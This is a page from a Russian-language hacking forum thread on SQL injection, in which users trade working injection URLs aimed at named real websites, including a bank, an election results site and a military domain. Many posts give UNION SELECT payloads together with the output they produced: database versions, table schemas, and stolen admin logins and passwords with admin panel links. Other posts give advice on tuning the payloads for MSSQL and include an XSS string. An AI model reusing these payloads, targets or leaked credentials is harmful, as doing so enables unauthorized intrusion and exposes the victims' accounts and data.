SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. Fugitif

    Fugitif Elder - Старейшина

    Joined:
    23 Sep 2007
    Messages:
    407
    Likes Received:
    227
    Reputations:
    42
    Code:
    http://www.bsn.org.uk/script.php?id=1%20UNION%20SELECT%201,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8/*
     
  2. tor4)

    tor4) Elder - Старейшина

    Joined:
    27 May 2008
    Messages:
    45
    Likes Received:
    21
    Reputations:
    -6
    http://www.lib.walla.ru/

    http://www.lib.walla.ru/?cat_id=-1+order+by+1,2,3,4,5,6 --
    Версию не показывает но 5-ая, потомучто по одному ip c http://www.antijob.ru/


    Ладно.
    login: bob
    pass: vova123
    Входишь под админом, а админка скидывает на index Хрень)
     
    1 person likes this.
  3. S0ulVortex

    S0ulVortex Elder - Старейшина

    Joined:
    18 Nov 2007
    Messages:
    161
    Likes Received:
    85
    Reputations:
    10
    Code:
    http://www.e-light.com.ua/line2.php?lng=ru&art=16+limit+0+union+select+1,2,concat_ws(0x3a3a,us er_login,user_passw),4,5,6,7+from+auth_users+limit+3,10/*&cat=2
    http://www.lavina.dp.ua/line2.php?lng=ru&art=16+limit+0+union+select+1,2,concat_ws(0x3a3a,us er_login,user_passw),4,5,6,7+from+auth_users+limit+3,10/*&cat=2
    http://www.angeldent.com.ua/line2.php?lng=ru&art=16+limit+0+union+select+1,2,concat_ws(0x3a3a,us er_login,user_passw),4,5,6,7+from+auth_users+limit+3,10/*&cat=2
    http://vesnabrand.com.ua/line2.php?lng=ru&art=16+limit+0+union+select+1,2,concat_ws(0x3a3a,us er_login,user_passw),4,5,6,7+from+auth_users+limit+3,10/*&cat=2
    Админка для всех этих сайтов
    www.as-admin.com/index.php
     
    2 people like this.
  4. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    696
    Likes Received:
    404
    Reputations:
    134
    Dbname:TownWWW
    Version:4.0.18-standard
    User:[email protected]

    mysql.user
    sql-server в локалке ((
     
    3 people like this.
  5. serfertty

    serfertty Guest

    Reputations:
    0
    Багу пофиксели но может кто скажет почему было так
    Code:
    ttp://www.results.cec.gov.ge//major_olq.php?district=1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+where+table_name+not+in+(char(111)+char(108)+char(113)+char(101)+char(98))))--
    Выводилась ошибка

    Code:
    Warning: mssql_query() [function.mssql-query]: message: Incorrect syntax near 'char'. (severity 15) in /www/html/shedegebi2008parl/major_olq.php on line 14
    Вопрос почему?
     
  6. А®ТеS

    А®ТеS Active Member

    Joined:
    25 Nov 2006
    Messages:
    198
    Likes Received:
    193
    Reputations:
    41
    Shaitan-Devil, это было потому, что у тебя шли функции char, разделенные пробелами, вот так:
    Code:
    (char(111)+char(108)+char(113)+char(101)  +char(98))
    Т.к. + здесь будет идти как пробел. А синтаксис SQL это не понимает. Надо было юзать такую конструкцию:
    Code:
    char(111,108,113,101,98)
     
  7. serfertty

    serfertty Guest

    Reputations:
    0
    Разве такая конструкция для МССКЛ а подойдет?Мне казалось это тока стандарт АНСИ
     
  8. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Правильно тебе казалось, надо было + заменить на %2B, тоесть так:
    where+table_name+not+in+(char(111)%2Bchar(108)%2Bchar(113)%2Bchar(101)%2Bchar(98))))--

    А эта конструкция char(111,108,113,101,98) работать на MSSQL не будет

    А ещё лучше Hex
     
    #6288 Kakoytoxaker, 16 Aug 2008
    Last edited: 16 Aug 2008
  9. serfertty

    serfertty Guest

    Reputations:
    0
    В том случае HEX не подходил я уже пробовал
     
  10. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108
    http://www.sinfonie-hausverwaltung.de/news.php?id=-1+union+select+1,2,3,concat(username,0x3a3a,password),5,6,7,8,9,10,11,12,13,14,16+from+sinfonie_user+limit+1,10/*
    login: ice
    password: xferrari

    http://www.sinfonie-hausverwaltung.de/admin
     
  11. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    696
    Likes Received:
    404
    Reputations:
    134
    какая то скуля,как мне кажется..мне такая еще не встречалась. кто попробует крутнуть?)
     
  12. S0ulVortex

    S0ulVortex Elder - Старейшина

    Joined:
    18 Nov 2007
    Messages:
    161
    Likes Received:
    85
    Reputations:
    10
    http://www.womennet.ca/directory.php?browse&"><script>alert('S0ulVortex')</script>
    это не скуля это xss помойму
     
  13. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    Photohost.ru
    Kinomob.info
    Gpb.ge
    5 ver. tables
    /admin

    Photodom.com
    Shadeaux.net
    Hiveprojects.com.au
    Bpjt.net
    S-dir.net.ua
    Tniad.mil.id
     
    #6293 sabe, 16 Aug 2008
    Last edited: 16 Aug 2008
    4 people like this.
  14. FaR-G9

    FaR-G9 Member

    Joined:
    19 Dec 2006
    Messages:
    114
    Likes Received:
    28
    Reputations:
    -4
    http://www.krabbelnu.com/categorie.php?cat=99999999+union+select+version()/*

    version(): 5.0.38-Ubuntu_0ubuntu1.4-log
    database(): 22928krabb
    user(): [email protected]

    в БД 2 таблицы : krabbel_plaatjes и links

    krabbel_plaatjes:
    Code:
       plaatje_id
       plaatje_url
       plaatje_cat
    
    links
    Code:
       id
       titel
       url
       important
       dik
    
     
  15. serfertty

    serfertty Guest

    Reputations:
    0
    Нет там не Хсс 90%.Где-то я такое втречал,имхо нужен посимвольный.
     
  16. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    http://www.womennet.ca/directory.php?browse&1/**/union/**/select/**/1,version(),3,4,5/*

    PS И давай на будующее, вопросы в соседнюю тему
     
    2 people like this.
  17. SWAT

    SWAT Elder - Старейшина

    Joined:
    14 Dec 2006
    Messages:
    198
    Likes Received:
    196
    Reputations:
    -7
    какой-то банк
    http://www.fibank.al/index.php?language=-1/**/union/**/select/**/1,2,3,4,5,6,version(),8,9,10,11,12,13,14,15,16,17/*

    Database: website
    User: webmaster@localhost
    Version: 5.0.32-Debian_7etch6-log

    Table: Columns]
    [0]admins: ID,username,password
    [1]contents: ID,menuID,priority,typeID,c1,c2,c3,c4,c5,c6,c7,c8,c9,c10,fileext,showonweb,preview
    [2]dropdown: ID,name_1,name_38,tablename,priority,name_
    [3]errors: ID,name_1,name_38
    [4]feedbackform: ID,fieldname,fieldtype,name_1,name_38,name_81
    [5]feedbacks: company,name,office,phone,fax,email,subject,answer,content,ID,recorddate
    [6]forms: ID,name_1,name_38,fieldname,fieldtype,comment_1,comment_38,formname
    [7]menus: ID,parent,name,priority,showonweb,preview
    [8]offices: ID,email,name_1,name_38,name_81
    [9]ordercalc: ID,name_1,name_38
    [10]orders: ID,office,volume,slanguage,tlanguage,theme,qtime,quantity,correction,professional,delivery,model,modelother,storage,format,formatother,payment,notes,submited,datep,duration,address,technics,uploadfile
    [11]prices: ID,slanguageID,tlanguageID,priceperpage,priceperword,priceperhour,priceperhoursim
    [12]qcountries: ID,q,name_1,name_38
    [13]qtimes: ID,name_1,q,name_38
    [14]types: ID,Name,Description,c1,c2,c3,c4,c1type,c2type,c3type,c4type,fileext,hasimage,c5,c6,c7,c8,c9,c10,c5type,c6type,c7type,c8type,c9type,c10type,image1,image2,image3,image4,image5,image6,image7,image8,image9,image10,priority
    [15]users: username
     
    2 people like this.
  18. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108
    Какая-то америкосовская научная муть...

    http://www.testzentrale.de/?mod=detail&id=1'+union+select+1,concat(0x3a3a,unhex(hex(username)),0x3a3a,unhex(hex(password))),3,4,5,6+from+_verwaltung.tbl_user+limit+1,3/*

    http://www.hogrefe.com/index.php?mod=login
    Login:[email protected] pass:ZeUs
     
  19. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108
    http://www.bueroschnaeppchen.de/shop/seller.php?id=-1+union+select+1,2,3,4,5,6,concat(login,0x3a3a,password),8+from+users+limit+1,10/*

    login: nmb pass: 37f2123f20176519<-хз что
     
    1 person likes this.
  20. Гаральд

    Гаральд New Member

    Joined:
    28 Jun 2007
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    http://www.autoexotica.ru/news/?nid=130'
     
Thread Status:
Not open for further replies.